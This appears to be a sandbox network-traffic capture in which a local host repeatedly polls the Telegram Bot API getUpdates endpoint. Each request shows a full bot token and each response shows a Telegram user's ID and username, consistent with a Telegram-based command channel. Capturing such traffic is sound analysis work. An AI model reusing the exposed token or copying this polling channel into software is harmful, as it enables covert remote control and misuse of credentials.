2024-06-05 01:57:39 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49810	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:40 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:40 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:40 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49811	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:41 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:41 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:41 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49812	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:42 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:42 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:42 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49813	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:43 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:43 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:44 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49814	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:44 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:44 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:44 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49815	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:45 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:46 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:46 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49816	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:46 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:46 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:47 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49817	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:48 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:48 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:48 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49818	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:48 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:49 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:49 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49819	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:50 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:50 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:50 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49820	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:51 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:51 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:51 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49821	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:52 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:52 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:52 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49822	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:53 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:53 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:53 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: 